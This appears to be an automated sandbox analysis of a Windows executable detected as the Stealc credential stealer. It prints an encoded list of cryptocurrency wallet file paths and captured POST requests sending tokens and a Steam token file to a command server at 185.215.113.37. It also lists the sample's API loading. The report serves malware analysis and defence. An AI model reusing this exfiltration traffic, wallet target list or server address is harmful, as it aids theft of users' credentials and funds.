Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Oct 24, 2024 13:02:22.537347078 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBF Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 2d 2d 0d 0a Data Ascii: ------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="message"files------KFHJJJKKFHIDAAKFBFBF--
Oct 24, 2024 13:02:22.822642088 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:22 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 13:02:22.832777977 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGIDGCGIEGDGDGDGHJKK Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="file"------CGIDGCGIEGDGDGDGHJKK--
Oct 24, 2024 13:02:23.770083904 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:22 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 13:02:23.813695908 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHIDAKECFIEBGDHJEBK Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 2d 2d 0d 0a Data Ascii: ------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="message"ybncbhylepme------AEHIDAKECFIEBGDHJEBK--
Oct 24, 2024 13:02:24.103723049 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:23 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 5793 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 67 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 69 6e 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 70 74 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 64 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f [TRUNCATED] Data Ascii: .pl<br> 1.google.com.google.com<br>.ar<br> 1.google.com.google.com<br>.br<br> 1.google.com.google.com<br>.ec<br> 1.google.com.google.com<br>.eg<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.pt<br> 1.google.com.google.com<br>.ac<br> 1.google.com.google.com<br>.bd<br> 1.google.com.google.com<br>.zm<br> 1.google.com.google.com<br>.ve<br> 1.google.com.google.com<br>.pk<br> 1.google.com.google.com<br>.rs<br> 1.google.com.google.com<br>.ph<br> 1.google.com.google.com<br>.mx<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.th<br> 1.google.com.google.com<br>.id<br> 1.google.com.google.com<br>.tr<br> 1.google.com.google.com<br>.cz<br> 1.google.com.google.com<br>.io<br> 1.google.com.google.com<br>.dz<br> 1.google.com.google.com<br>.de<br> 1.google.com.google.com<br>.kr<br> 1.google.com.google.com<br>.ma<br> 1.google.com.google.com<br>.jp<br> 1.google.com.google.com
Oct 24, 2024 13:02:24.105417013 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFIDGDBGCAAFIDHIJKEH Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 2d 2d 0d 0a Data Ascii: ------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="message"wkkjqaiaxkhb------AFIDGDBGCAAFIDHIJKEH--
Oct 24, 2024 13:02:24.881712914 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:24 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	07:01:56
Start date:	24/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xab0000
File size:	1'866'752 bytes
MD5 hash:	37F84F1CE614D05FDD3BD682B3815785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2426216663.0000000000646000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2426216663.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2151981046.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	38

Executed Functions

Function 00AC9860 Relevance: 65.0, APIs: 33, Strings: 4, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76210000,005E1660), ref: 00AC98A1
GetProcAddress.KERNEL32(76210000,005E1678), ref: 00AC98BA
GetProcAddress.KERNEL32(76210000,005E1648), ref: 00AC98D2
GetProcAddress.KERNEL32(76210000,005E1540), ref: 00AC98EA
GetProcAddress.KERNEL32(76210000,005E17F8), ref: 00AC9903
GetProcAddress.KERNEL32(76210000,005E8A48), ref: 00AC991B
GetProcAddress.KERNEL32(76210000,005D6A00), ref: 00AC9933
GetProcAddress.KERNEL32(76210000,005D6940), ref: 00AC994C
GetProcAddress.KERNEL32(76210000,005E1708), ref: 00AC9964
GetProcAddress.KERNEL32(76210000,005E1570), ref: 00AC997C
GetProcAddress.KERNEL32(76210000,005E17B0), ref: 00AC9995
GetProcAddress.KERNEL32(76210000,005E16C0), ref: 00AC99AD
GetProcAddress.KERNEL32(76210000,005D6780), ref: 00AC99C5
GetProcAddress.KERNEL32(76210000,005E1588), ref: 00AC99DE
GetProcAddress.KERNEL32(76210000,005E1600), ref: 00AC99F6
GetProcAddress.KERNEL32(76210000,005D6900), ref: 00AC9A0E
GetProcAddress.KERNEL32(76210000,005E17C8), ref: 00AC9A27
GetProcAddress.KERNEL32(76210000,005E16D8), ref: 00AC9A3F
GetProcAddress.KERNEL32(76210000,005D67A0), ref: 00AC9A57
GetProcAddress.KERNEL32(76210000,005E1840), ref: 00AC9A70
GetProcAddress.KERNEL32(76210000,005D6960), ref: 00AC9A88
LoadLibraryA.KERNEL32(005E1888,?,00AC6A00), ref: 00AC9A9A
LoadLibraryA.KERNEL32(005E18A0,?,00AC6A00), ref: 00AC9AAB
LoadLibraryA.KERNEL32(005E1858,?,00AC6A00), ref: 00AC9ABD
LoadLibraryA.KERNEL32(005E18E8,?,00AC6A00), ref: 00AC9ACF
LoadLibraryA.KERNEL32(005E18B8,?,00AC6A00), ref: 00AC9AE0
GetProcAddress.KERNEL32(75B30000,005E18D0), ref: 00AC9B02
GetProcAddress.KERNEL32(751E0000,005E1828), ref: 00AC9B23
GetProcAddress.KERNEL32(751E0000,005E1870), ref: 00AC9B3B
GetProcAddress.KERNEL32(76910000,005E8D98), ref: 00AC9B5D
GetProcAddress.KERNEL32(75670000,005D6760), ref: 00AC9B7E
GetProcAddress.KERNEL32(77310000,005E89A8), ref: 00AC9B9F
GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00AC9BB6

Strings

@i], xrefs: 00AC993E
`i], xrefs: 00AC9A7B
NtQueryInformationProcess, xrefs: 00AC9BAA
`g], xrefs: 00AC9B71

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: @i]$NtQueryInformationProcess$`g]$`i]
API String ID: 2238633743-1495578594
Opcode ID: 75427305eb81a9811f81b8db2de8825055e532e62250cd16fb5c29669043d2e0
Instruction ID: 6ec0c977b48f12ca3598686bc285535f13f3276af171458d0e67a98802e4191c
Opcode Fuzzy Hash: 75427305eb81a9811f81b8db2de8825055e532e62250cd16fb5c29669043d2e0
Instruction Fuzzy Hash: 18A139F5500201AFD344EBA9ED88FBEBBF9F74C381714951AA60DC32A4D679A841CB53

Function 00AB45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 00AB460F
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00AB479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB4622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB46CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB45D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB4734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB4713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB4678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB45E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB46B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB45C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB4683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB4638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB4770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB46C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB4617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB4657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB4662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB45DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB46D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB4765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB46AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB4729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB45F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AB4643

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer 